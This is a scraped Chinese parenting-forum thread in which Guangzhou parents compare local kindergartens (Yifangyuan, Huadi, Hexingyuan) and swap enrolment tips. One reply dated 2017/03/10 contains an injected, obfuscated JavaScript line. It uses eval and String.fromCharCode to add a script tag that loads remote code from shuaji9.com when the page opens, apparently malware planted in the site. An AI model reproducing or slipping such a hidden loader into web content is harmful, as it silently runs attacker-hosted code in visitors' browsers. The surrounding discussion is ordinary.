帖子详情

芳村怡芳苑艺术幼儿园好吗?还是去花地幼儿园好啊?

1836527幼儿园早教

孩子今年8月要读幼儿园了,去读怡芳苑还是去花地幼好啊?有在读怡芳苑的宝妈吗?求赐教,急啊。幼儿园打来下星期得去注册了。读还是不读啊?
精选回帖
8楼
1970/01/01回复
mixiunamixiuna12楼
关键是宝宝现在在山东,她奶奶不想那么早来,说这边太热了,说就报个名,给老师看看照片,或者视频也行…………因为读的前期需要她帮忙带带,然后我再自己带,唉!过两天直接去幼儿园问一下吧,谢谢宝妈!
2017/03/07回复
$('ed2k_9pJ').innerHTML=htmlspecialchars(unescape(decodeURIComponent('filesize')))+' ('+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+' Bytes)';还是选怡芳苑吧
2017/03/10回复
mixiunamixiuna20楼
我现在就是住合兴苑,所以在考虑到底是合兴苑还是花地,同事的宝宝在花地,她就说挺好的,教育为主,合兴苑我看了其他宝妈的评论,似乎不太好,纠结啊!
2017/05/03回复
全部回帖
靓靓华华哗:
孩子今年8月要读幼儿园了,去读怡芳苑还是去花地幼好啊?有在读怡芳苑的宝妈吗?求赐教,急啊。幼儿园打来下星期得去注册了。读还是不读啊?
查看原文
宝妈们给我点建议吧,到底这幼儿园好吗,选幼儿园选到想哭,心大心细,好凄凉啊。跪求答案啊
2016/05/17回复
rubykissrubykiss板凳
怡芳苑
靓靓华华哗:
查看原文
花地幼儿园我之前去看过,花地实在太差了,环境不好,园内活动范围不大,如果你要在这两家选一家,那肯定是怡芳苑的。
我宝快2岁半了。恒荔怡乐、合兴苑、怡芳苑、花地幼4间我都去睇过。入去睇完实地了解过后,合兴苑是第一间out的,因为小小班是唔上课坐在科室玩玩具,去了两次,两次都是这样。怡乐是这4间学费最贵的,老师比较年轻,课室不大,里面的装修其实也真的不怎么样。至于花地幼虽然细但是小小班每日早上都要上英语课,老师望落去都比较细心。怡芳苑上课期间是不准入去参观的,只能在放学入去望下,而且只能望1楼。唔清楚是点上课的,这就是我一直纠结去花地幼还是怡芳苑。我在同一日收到这两间幼儿园的收生通知。
2016/05/18回复
怡芳苑的口碑是不错,但是上年出了一单老师打学生的微博。闹到警察上门。所以心里还是有点担心。后续发展唔知答案。怡芳苑门口是挂住个学武术的牌。我听人讲里面D细路是要学武术的,如果是女仔就去读花地幼,学跳舞,成日参加比赛。至于学游水,我问过花地幼D老师,她们话每年夏天都是康有为小学会过来收D B仔过去学。
2016/05/18回复
请问楼主最后去了哪一家幼儿园?我也在考虑这几家
2016/12/09回复
今年9月份准备让囡囡在花地幼儿园读,打了学校电话,说报名那天也要带小朋友一块过去,有已经在那边读的吗?具体报名方式是怎么样的呀,因为听同事跟朋友,有的话要有的说不用,捉急啊,盼复!
2017/03/05回复
catkitcatkit9楼
mixiuna:
今年9月份准备让囡囡在花地幼儿园读,打了学校电话,说报名那天也要带小朋友一块过去,有已经在那边读的吗?具体报名方式是怎么样的呀,因为听同事跟朋友,有的话要有的说不用,捉急啊,盼复!
查看原文
我地旧年去既时候带埋小朋友去噶,其实就系望下小朋友,问几个号简单问题而已,五使紧张
2017/03/06回复
宝妈,我儿子一直在怡芳艺术幼儿园就读,那里的园长和老师都很好,对孩子很有爱心,对于宝妈说的打人事件,据我所知警察已经查清楚,是子虚乌有的事,也给幼儿园和那位老师还了清白,现在我的小儿子也想进去读书,但是园方说暂时还没有学位,先接受报名,还温馨提示我们要去其他幼儿园报名,免得耽误我们孩子的上学,期待5月份接到幼儿园的注册通知!
mixiunamixiuna11楼
catkit 发表于 2017-03-06 15:11
回复 mixiuna 的帖子

我地旧年去既时候带埋小朋友去噶,其实就系望下小朋友,问几个号简单问题而已,五使..
关键是宝宝现在在山东,她奶奶不想那么早来,说这边太热了,说就报个名,给老师看看照片,或者视频也行…………
因为读的前期需要她帮忙带带,然后我再自己带,唉!过两天直接去幼儿园问一下吧,谢谢宝妈!
catkit:
我地旧年去既时候带埋小朋友去噶,其实就系望下小朋友,问几个号简单问题而已,五使紧张
查看原文
我也去报名了  不清楚能不能接到5月份注册通知
2017/03/08回复
catkitcatkit13楼
蔚蓝国际:
我也去报名了  不清楚能不能接到5月份注册通知
查看原文
我去年5月份先去报名,都无问题,五使担心
翠竹苑里面有家叫什么怡幼儿园的,大家知道吗?里面怎么样

还是选怡芳苑吧
mixiunamixiuna16楼
靓靓华华哗 发表于 2016-05-18 11:38
我宝快2岁半了。恒荔怡乐、合兴苑、怡芳苑、花地幼4间我都去睇过。入去睇完实地了解过后,合兴苑是第一间ou..
亲,花地幼儿园的老师对小朋友们细心不?
2017/03/13回复
mixiuna:
查看原文
合兴苑前几天也去看了,户外场所确实很大,不过负责接待的是个类似大妈性质的人,没有一点老师的素养,拼命的忽悠我,让我们报小小班
2017/03/23回复
mixiuna:
查看原文
合兴苑前几天也去看了,户外场所确实很大,不过负责接待的是个类似大妈性质的人,没有一点老师的素养,拼命的忽悠我,让我们报小小班
2017/03/23回复
mixiunamixiuna19楼
蔚蓝国际 发表于 2017-03-23 08:48
回复 mixiuna 的帖子

合兴苑前几天也去看了,户外场所确实很大,不过负责接待的是个类似大妈性质的人,没..
我现在就是住合兴苑,所以在考虑到底是合兴苑还是花地,同事的宝宝在花地,她就说挺好的,教育为主,合兴苑我看了其他宝妈的评论,似乎不太好,纠结啊!
2017/05/03回复
猜你喜欢

有没有粤垦路附近,9月份读幼儿园的宝宝

越秀中大北校区幼儿园和天河侨怡幼儿园哪个好

越秀区学位旧房还是海珠区回迁新房?

请问入读黄埔怡蕾幼儿园一定要怡港花园的业主吗?

西关幼和比诺纠结读哪个好啊……

番禺东怡新区附近的幼儿园

热点推荐

学生卡也可以用手机充值 还不用去线下

海银海记40蚊火锅套餐 肥牛嫩肉一样没少

每年必打卡一次!惠州巽寮湾真越来越美!

8点后的永旺好多东西捡漏!生鲜区折扣好抵

速速归队!广州妈妈网喊你回家啦

生活因爱而美好!

这年头小朋友喜欢玩烟卡?

今日谷雨,春和景明,雨泽万物,播种希望

拿闲置书本,来凯德广场换蔬菜啦!

澳门打卡夜景,体验无人驾驶轻轨!

贵定-金海雪山

粘土温泉鸭

达美乐比萨买一送一啦

查看更多热点 >